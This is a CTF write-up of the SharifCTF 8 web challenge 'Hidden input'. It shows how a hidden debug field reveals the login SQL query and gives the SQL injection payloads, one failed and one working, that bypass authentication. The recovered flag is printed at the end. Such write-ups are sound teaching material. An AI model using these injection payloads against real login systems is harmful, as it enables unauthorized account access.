writeups

SharifCTF 8 - Write-ups

noraj (Alexandre ZANNI)
, , ,
🇬🇧

Information#

Version#

By Version Comment
noraj 1.0 Creation

CTF#

  • Name : SharifCTF 8
  • Website : ctf.certcc.ir
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

50 - Hidden input - Web#

Login if you can :)

There is an hidden input:

1
2
3
4
5
6
7
8
9
<form method="POST" action="login.php">
	<div class="login-block">
		<h1>Login</h1>
		<input type="text" value="" placeholder="Username" id="Username" name="Username"/>
		<input type="password" value="" placeholder="Password" id="Password" name="Password"/>
		<input type="hidden" name="debug" id="debug" value="0">
		<button>Login</button>
	</div>
</form>

And change the debug POST value to get: Username=admin&Password=pass&debug=1.

This is showing us the SQL query used.

1
2
3
username: admin
password: pass
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('pass')

First I think this payload should work but it didn't.

Username=admin%27%29--+-&Password=sdf&debug=0

1
2
3
username: admin')-- -
password: sdf
SQL query: SELECT * FROM users WHERE username=('admin')-- -') AND password=('sdf')

Comment doesn't seem to work so let's generate a fully working querry:

Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1

1
2
3
username: admin
password: ') OR 1=1 OR 999 > ORD('a
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('') OR 1=1 OR 999 > ORD('a')

Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}

Share